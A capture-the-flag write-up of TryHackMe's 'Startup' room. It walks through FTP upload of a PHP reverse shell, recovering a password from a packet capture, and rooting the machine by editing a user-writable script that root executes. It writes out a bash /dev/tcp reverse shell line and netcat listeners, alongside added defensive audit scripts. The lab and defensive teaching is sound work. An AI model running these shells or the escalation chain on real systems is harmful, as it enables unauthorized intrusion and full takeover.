[CTF] Tryhackme : Startup

8 min read · Dec 29, 2020

01 : Introduction

This article is dedicated to the room called “Startup” on the TryHackMe platform. It is rated “easy” and calibrated for beginners, so if you are starting out in cybersecurity and/or CTFs, this room is perfect for you.

In this room, we’ll explore these topics :

  • Web exploitation
  • Networking

Let’s begin by starting the machine and scanning its ports!

02 : Enumeration

The first step, as usual, is to scan the ports of the remote machine to see which services are running. We use the ‘nmap’ tool, like this:

nmap -sC -sV <IP>

And we get the following result :

Result of nmap command

We have 3 open ports: FTP on port 21, SSH on 22 and an Apache web server on port 80. As we can see, the FTP server accepts anonymous logins, so let’s start with this service to see what it holds. We can log in with the ftp command:

ftp <IP>

Then we just enter ‘anonymous’ as the username and leave the password blank, and here we are! We can enumerate the directory with Unix-like commands such as ls.

FTP enumeration

As we can see, there is an image and a text file. We can download them to our machine with the ‘get’ command, as on the image above. There is also an ftp folder, empty, but with full permissions for anyone. This could be interesting later…

Text content

Now that we have the files on our computer, we read the text file: it seems that some people are using the website to download content. We have a name, Maya, which could be useful later, as it may be a username on the remote machine. The image is probably a meme, as suggested in the text. We can now check the website to discover something else.

Website homepage

Well, the homepage seems empty, no clue there. The page source does not reveal much more either. So we enumerate this website with the gobuster tool, using this command:

gobuster dir -u http://<IP> -w <wordlist file> -x php,txt

gobuster enumeration

And we have a result! There is a folder called files. Let’s check its content.

file folder content

As we can see, the FTP content is reachable from the website. And the ftp folder, as I mentioned before, is empty:

ftp folder is empty

03 : Foothold

The first thing that comes to mind is a ‘reverse shell’: we can use this technique to get access to the machine. What we have to do is upload a reverse shell, written in PHP since the web server can surely interpret it, and open it from the website. First we need to create our reverse shell: we can download one from this GitHub repository. We don’t forget to set the IP, our TryHackMe VPN IP, and the port. I suggest 1234, as it’s easy to remember and doesn’t require elevated privileges.

Now that our reverse shell is ready, it’s time to upload it by FTP.

reverse shell upload

I tried to upload it to the root folder, but I do not have write permission there, so I tried the ftp folder and it works!

We have uploaded our reverse shell; now we can use netcat to listen on port 1234:

nc -lvp 1234

Final step: trigger the shell. We just have to open our uploaded file from the website. If we refresh /files/ftp, we can now see our file:

uploaded reverse shell

Now click on the file and check the terminal running netcat…

Everything works as planned! We are inside the machine now. But as we can see, we are not a privileged user. So enumeration is the next step, to find anything interesting that lets us reach a user with higher privileges.
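As an added, defender-side example (my code, not part of the original writeup), the following Python script looks for exactly the condition exploited here: a directory under the web root that any local account can write to, with interpreter-handled files already inside it. The tree it builds in a temp directory is constructed to mirror the room’s layout (files/ftp, reverse.php); the Apache directives it suggests assume mod_php (php_admin_flag) and mod_mime (RemoveHandler) are loaded.

```python
import os
import stat
import tempfile
from pathlib import Path

# File types the web server would hand to an interpreter instead of serving as-is.
SCRIPT_SUFFIXES = {".php", ".phtml", ".phar", ".cgi", ".pl", ".py", ".sh"}


def audit_webroot(webroot):
    """Walk a document root and return every directory that group or other can
    write to, together with any interpreter-handled files already inside it.
    Such a directory is the upload-then-execute path: whoever can write there
    (here: the FTP anonymous account) can drop a script the web server will run."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        mode = os.stat(dirpath).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            scripts = sorted(f for f in filenames
                             if Path(f).suffix.lower() in SCRIPT_SUFFIXES)
            findings.append({
                "dir": os.path.relpath(dirpath, webroot),
                "mode": oct(stat.S_IMODE(mode)),
                "scripts": scripts,
            })
    return findings


def apache_hardening(directory):
    """Apache <Directory> block that keeps a writable upload directory from
    executing anything: PHP engine off (mod_php), no handler for script
    suffixes (mod_mime), no CGI, no listing. Fixing ownership so the FTP
    account cannot write into the web root at all comes first; this is the
    defence in depth behind it."""
    return (
        f'<Directory "{directory}">\n'
        "    php_admin_flag engine off\n"
        "    RemoveHandler .php .phtml .phar\n"
        "    Options -ExecCGI -Indexes\n"
        "</Directory>\n"
    )


def demo():
    """Constructed tree mirroring the room: files/ is read-only for others,
    files/ftp/ is world-writable and already holds an uploaded PHP file."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "files" / "ftp").mkdir(parents=True)
    (root / "files" / "notice.txt").write_text("constructed: ftp notice\n")
    (root / "files" / "ftp" / "reverse.php").write_text(
        "<?php /* constructed placeholder, no code */ ?>\n")
    os.chmod(root / "files", 0o755)
    os.chmod(root / "files" / "ftp", 0o777)      # the misconfiguration
    return audit_webroot(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['dir']} mode={finding['mode']} scripts={finding['scripts']}")
        print(apache_hardening("/var/www/html/" + finding["dir"]))
```

Run against a real document root (`audit_webroot("/var/www/html")`) the same function reports the ftp directory with mode 0o777 and whatever has been dropped into it; the emitted `<Directory>` block goes into the site’s vhost configuration.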

04 : Privilege escalation

If we run ‘ls’ at the root of the filesystem, we can see a text file:

Let’s see what it contains… It seems to be the answer to the first question, proving that we got access to the machine (foothold).

If we look closely at the screenshot above, there is an interesting detail: a folder called ‘incidents’. There is usually no folder with that name there.

This folder contains a file ‘suspicious.pcapng’. Pcapng stands for ‘PCAP Next Generation packet capture file’, so it contains captured network packets. We can analyse its content with a dedicated application such as Wireshark. But first we need to retrieve this file from the remote machine. The idea is to move or copy the file into the FTP folder. As we saw, the ftp folder is served by the web application. The usual path for web server content on Unix is /var/www/html/; adding /files/ftp to it probably gives the full path. So let’s move the file with the ‘mv’ command:

The command works, the theory was correct! Now we just have to retrieve the file over FTP, as we did at the beginning of this CTF.

Connect as anonymous, then change folder with ‘cd ftp’ and use the ‘get’ command to retrieve the file.

Now we can start Wireshark, a common and popular tool for analysing network traffic. When you open the file, you should get something like this:

After a quick look, the first strange packet I stopped on was packet 34.

Someone requested the resource ‘files/ftp/shell.php’ on the web server… As our file was called reverse.php, shell.php was uploaded by someone else before us. We can deduce that someone used the same way to get access to the computer. This deduction is confirmed by the packets that follow. For example:

The command ‘cd lennie’ was used, but the user was not authorized. So we keep looking for something more useful and…

Before this packet, the user is asked for a password, since he used the command ‘su www-data’. Then we have this packet, containing what looks like a password. The password didn’t work: it does not belong to the user ‘www-data’. Then he left the session. But this password might still be useful: can we use it to log in as lennie? Let’s try it in our session. We use ‘su lennie’ to switch user and enter the password…

It works! Now we have access to lennie’s account. If we check his home directory, we find the user flag!
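As an added example (my code, not the author’s and not the room’s capture), here is a small pure-Python reader that does what the Wireshark walk-through above does by hand: reassemble each TCP flow and pull out HTTP requests, `su` attempts and the line typed right after a `Password:` prompt, i.e. a credential crossing the wire in cleartext. It handles only the classic little-endian pcap format (the room’s file is pcapng, which Wireshark and tshark read directly) and builds its own capture from constructed packets; the IP addresses, hostname and password in it are made up.

```python
import re
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4        # classic libpcap; written little-endian below
LINKTYPE_ETHERNET = 1
ATTACKER, VICTIM = "192.0.2.10", "198.51.100.20"   # RFC 5737 documentation addresses


def build_pcap(segments):
    """Serialise (src_ip, dst_ip, sport, dport, payload) tuples as a classic
    libpcap file with Ethernet/IPv4/TCP framing. MACs and checksums are zero:
    only the fields the parser below reads are filled in. Constructed data."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for ts, (src, dst, sport, dport, payload) in enumerate(segments, start=1):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                         bytes(map(int, src.split("."))),
                         bytes(map(int, dst.split(".")))) + tcp
        frame = b"\x00" * 12 + b"\x08\x00" + ip          # zero MACs, EtherType IPv4
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def tcp_payloads(pcap):
    """Yield (src, sport, dst, dport, payload) for each TCP segment carrying data."""
    if struct.unpack_from("<I", pcap, 0)[0] != PCAP_MAGIC:
        raise ValueError("not a little-endian classic pcap (pcapng needs another reader)")
    if struct.unpack_from("<I", pcap, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("unsupported link type")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl, _orig = struct.unpack_from("<IIII", pcap, off)
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                  # not IPv4 over Ethernet, or not TCP
        ihl = (frame[14] & 0x0F) * 4
        total = struct.unpack_from("!H", frame, 16)[0]
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:14 + total]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]           # skip the TCP header (data offset)
        if payload:
            yield src, sport, dst, dport, payload


HTTP_REQUEST = re.compile(rb"^(?:GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]", re.M)
SU_COMMAND = re.compile(rb"\bsu\s+(\S+)")
PASSWORD_PROMPT = re.compile(rb"Password:\s*([^\r\n]+)")


def analyse(pcap):
    """Reassemble each TCP flow (both directions, in capture order) and report
    requests for uploaded scripts, 'su' attempts and whatever was typed after
    a 'Password:' prompt. A reverse shell is plain TCP, so all of it is visible."""
    flows = defaultdict(bytes)
    for src, sport, dst, dport, payload in tcp_payloads(pcap):
        flows[tuple(sorted([(src, sport), (dst, dport)]))] += payload
    findings = []
    for data in flows.values():
        findings += [("http_request", m.group(1).decode()) for m in HTTP_REQUEST.finditer(data)]
        findings += [("su_attempt", m.group(1).decode()) for m in SU_COMMAND.finditer(data)]
        findings += [("cleartext_password", m.group(1).decode(errors="replace"))
                     for m in PASSWORD_PROMPT.finditer(data)]
    return findings


def demo_capture():
    """Constructed stand-in for suspicious.pcapng: one request for the uploaded
    shell, then a reverse-shell session (victim connects out to attacker:4444)."""
    def typed(data):   # attacker's keystrokes
        return (ATTACKER, VICTIM, 4444, 40123, data)

    def shown(data):   # victim's output
        return (VICTIM, ATTACKER, 40123, 4444, data)

    return build_pcap([
        (ATTACKER, VICTIM, 51000, 80, b"GET /files/ftp/shell.php HTTP/1.1\r\nHost: 198.51.100.20\r\n\r\n"),
        shown(b"www-data@startup:/$ "), typed(b"cd lennie\n"),
        shown(b"bash: cd: lennie: Permission denied\nwww-data@startup:/$ "),
        typed(b"su www-data\n"), shown(b"Password: "),
        typed(b"constructed-pass-123\n"), shown(b"su: Authentication failure\n"),
    ])


if __name__ == "__main__":
    for kind, value in analyse(demo_capture()):
        print(f"{kind}: {value}")
```

The defender’s takeaway is the same one the capture gave the author: a password typed into an unencrypted session is recoverable by anyone holding the traffic, and the `http_request` finding is what a web-access log or IDS rule for scripts under an upload directory would have flagged at the time.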

05 : Privilege escalation — Root part

What comes next? The short answer is: own root. To achieve this, there are many, many ways. But first, let’s have a look at the two folders we have: Documents and scripts. We can start with scripts.

Two items: a text file and a script. The text file is empty, but the script, planner.sh, contains some instructions: it writes the content of a variable, LIST, into the text file mentioned before. At the end, it calls another script, print.sh, located in /etc.

If we check the permissions, we notice that the script is owned by root.

Now, we can inspect the other script, print.sh.

There is not much content in this file… only one instruction, echo. But if we check the permissions again, we have a surprise:

This file is owned by… us! So we can do anything we want with it.

To summarize: a script owned by root calls another script owned by us. Do you see the problem? If root executes his file, he will execute our file, and so our instructions… with his privileges! What we have to do is rewrite our script to add a reverse shell (yes, again). This way, root will execute the instruction and give us a shell with his permissions. We can find many reverse shells there, and take the first one, written in bash. We add it to our script. Again, we don’t forget to modify the line: bash -i >& /dev/tcp/<YOUR TRYHACKME IP>/<PORT> 0>&1 ; in my case I used 1235 as the port.

We check that the line has been added correctly. Then we use netcat as before to listen on the chosen port.

Now all we have to do is wait for root to run his own script, which will probably take less than a minute, before this result:

Privilege escalation done: we now have root access on this machine. Before closing this article, we grab the root flag, located as usual in the root folder:
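As an added example (my code, not from the original article), the following Python audit automates the check that found this escalation path: starting from a script that root runs, follow every script it executes and report any that a non-root account could modify, including through a world-writable parent directory. The planner.sh/print.sh tree it creates in a temp directory is constructed to mirror the room; the paths, contents and permission bits there are assumptions, not the machine’s actual values.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# A line that runs an absolute path: bare "/etc/print.sh", or via source / . / bash / sh / exec.
EXEC_LINE = re.compile(r"^\s*(?:(?:source|\.|bash|sh|exec)\s+)?(/[^\s;|&]+)", re.M)


def modifiable_by_non_root(path):
    """Reasons a non-root account could change what this file executes: it is
    not owned by root, it is group/world writable, or it sits in a world-writable
    directory without the sticky bit (so it can simply be replaced)."""
    st = os.stat(path)
    reasons = []
    if st.st_uid != 0:
        reasons.append(f"owned by uid {st.st_uid}, not root")
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.stat(os.path.dirname(path)).st_mode
    if parent & stat.S_IWOTH and not parent & stat.S_ISVTX:
        reasons.append("parent directory world-writable")
    return reasons


def audit_script_chain(script, seen=None):
    """Follow every shell script that `script` executes, recursively, and return
    (caller, callee, reasons) for each callee a non-root user can tamper with.
    Point it at whatever root's crontab, systemd timers or rc files invoke."""
    seen = set() if seen is None else seen
    script = os.path.realpath(script)
    findings = []
    if script in seen:
        return findings
    seen.add(script)
    for match in EXEC_LINE.finditer(Path(script).read_text(errors="replace")):
        callee = match.group(1)
        if not os.path.isfile(callee):
            continue
        reasons = modifiable_by_non_root(callee)
        if reasons:
            findings.append((script, callee, reasons))
        if callee.endswith(".sh"):                 # keep following the chain
            findings.extend(audit_script_chain(callee, seen))
    return findings


def demo():
    """Constructed copy of the room's layout: planner.sh (what root's job would
    run) ends by calling print.sh, which is writable by everyone."""
    base = Path(tempfile.mkdtemp(prefix="audit-"))
    (base / "etc").mkdir()
    (base / "scripts").mkdir()
    printer = base / "etc" / "print.sh"
    printer.write_text("#!/bin/bash\necho 'Done!'\n")
    os.chmod(printer, 0o777)                       # the misconfiguration
    planner = base / "scripts" / "planner.sh"
    planner.write_text(
        "#!/bin/bash\n"
        f'LIST="$(ls -alh {base}/scripts)"\n'
        f'echo "$LIST" > {base}/scripts/startup_list.txt\n'
        f"{printer}\n"
    )
    os.chmod(planner, 0o755)
    return audit_script_chain(planner)


if __name__ == "__main__":
    for caller, callee, reasons in demo():
        print(f"{caller} -> {callee}: {', '.join(reasons)}")
```

The fix the finding points to is the usual one: anything a root job executes should be owned by root with mode 755 (or stricter), in a directory that only root can write to, so that no user account can substitute its own instructions.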

Now this room is completely over! I hope you enjoyed it! It was not very easy, but it’s a very fun room, especially for discovering packet analysis, which is not a common element in beginner rooms.
